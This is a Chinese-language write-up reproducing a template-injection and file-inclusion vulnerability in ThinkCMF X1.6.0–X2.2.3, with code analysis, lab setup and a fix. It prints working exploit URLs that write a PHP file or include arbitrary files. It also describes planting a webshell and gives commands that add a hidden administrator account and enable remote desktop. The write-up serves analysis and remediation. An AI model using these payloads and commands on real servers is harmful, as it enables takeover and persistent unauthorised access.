ThinkCMF X1.6.0-X2.2.3框架任意內容包含漏洞分析復現

  • 2019 年 11 月 5 日
  • 筆記

ThinkCMF X1.6.0-X2.2.3框架任意內容包含漏洞分析復現

一、ThinkCMF簡介

ThinkCMF是一款基於PHP+MYSQL開發的中文內容管理系統框架,底層採用ThinkPHP3.2.3構建。ThinkCMF提出靈活的應用機制,框架自身提供基礎的管理功能,而開發者可以根據自身的需求以應用的形式進行擴展。

每個應用都能獨立的完成自己的任務,也可通過系統調用其他應用進行協同工作。在這種運行機制下,開發商場應用的用戶無需關心開發SNS應用時如何工作的,但他們之間又可通過系統本身進行協調,大大的降低了開發成本和溝通成本。

二、漏洞描述

引起漏洞的最主要的問題是因為fetch函數和display函數是public類型。

fetch函數的作用是獲取頁面內容,調用內置模板引擎fetch方法,thinkphp的模版引擎使用的是smarty,在smarty中當key和value可控時便可以形成模板注入。

display函數的作用是加載模板和頁面輸出,所對應的參數為:templateFile模板文件地址,charset模板字符集,contentType輸出類型,content輸出內容。

fetch和display的用法差不多,二者的區別就是display方法直接輸出模板文件渲染後的內容,而fetch方法是返回模板文件渲染後的內容。

三、漏洞影響版本

ThinkCMF X1.6.0

ThinkCMF X2.1.0

ThinkCMF X2.2.0

ThinkCMF X2.2.1

ThinkCMF X2.2.2

ThinkCMF X2.2.3

四、漏洞環境搭建

1、下載ThinkCMF2.2.2版本,下載地址: https://github.com/thinkcmf/cmfx

2、解壓之後直接放到phpstudy環境的web根目錄下, 訪問http://192.168.10.171/cmfx/

  

3、輸入數據庫密碼,設置用戶名、密碼、郵箱等完成安裝設置,如下成功安裝

  

五、漏洞復現

1、使用sublime text打開cmfx-X2.2.2文件夾,首先分析主頁代碼,發現看一下程序的項目路徑在application目錄下

  

2、跟進application,發現IndexController.class.php(入口分組的控制器類)

  

3、發現IndexController類中只有一個方法display方法,跟進父類HomebaseController文件

  

4、根據ThinkPHP框架規則,可以通過gma參數指定分組模塊方法,這裡可以通過a參數直接調用PortalIndexController父類(HomebaseController)中的一些權限為public的方法。

ThinkPHP框架規則參考: https://www.cnblogs.com/czx521/p/6536954.html

5.1、分析發現display函數和fetch函數是權限為public, display函數的作用是加載模板和頁面輸出,所對應的參數為:templateFile模板文件地址,charset模板字符集,contentType輸出類型,content輸出內容。templateFile參數會經過parseTemplate函數處理。

  

5.2、跟進parseTemplate函數, 判斷模板是否存在,當模板不存在時會在當前目錄下開始查找,這裡配合一處上傳形成文件包含。最終形成的payload :index.php?a=display&templateFile=xx.txt

6、fetch函數的作用是獲取頁面內容,調用內置模板引擎fetch方法,thinkphp的模版引擎使用的是smarty,在smarty中當key和value可控時便可以形成模板注入。

這裡fetch函數的三個參數分別對應模板文件,輸出內容,模板緩存前綴。利用時templateFile和prefix參數可以為空,在content參數傳入待注入的php代碼即可。

7、第一種利用方法使用a參數的fetch方法,實現遠程代碼執行

7.1、payload如下:

?a=fetch&templateFile=public/index&prefix=”&content=<php>file_put_contents(‘test.php’,'<?php phpinfo(); ?>’)</php>

執行payload,頁面是空白的

  

7.2、訪問test.php

  

7.3、上傳一句話木馬

  

7.4、菜刀連接

  

7.5、新建用戶並添加到管理員組,開啟遠程桌面連接

net user test test /add

net localgroup administrators test /add

REG ADD HKLMSYSTEMCurrentControlSetControlTerminal” “Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f

  

7.6、然後遠程連接就行

  

8、第二種方法, 通過構造a參數的display方法,實現任意文件包含

Payload: ?a=display&templateFile=README.md

  

六、漏洞修復

可以通過漏洞成因看出來,引起漏洞最主要的原因就是fetch和display函數是public,可以在外面被訪問,因此修復方案就是將 HomebaseController.class.php 和 AdminbaseController.class.php 類中 display 和 fetch 函數的修飾符改為 protected,使他們無法在外面被訪問。

 

 

———————————————————————————— 

參考: https://xz.aliyun.com/t/6626

VirMach 便宜 VPS

QNews

QNews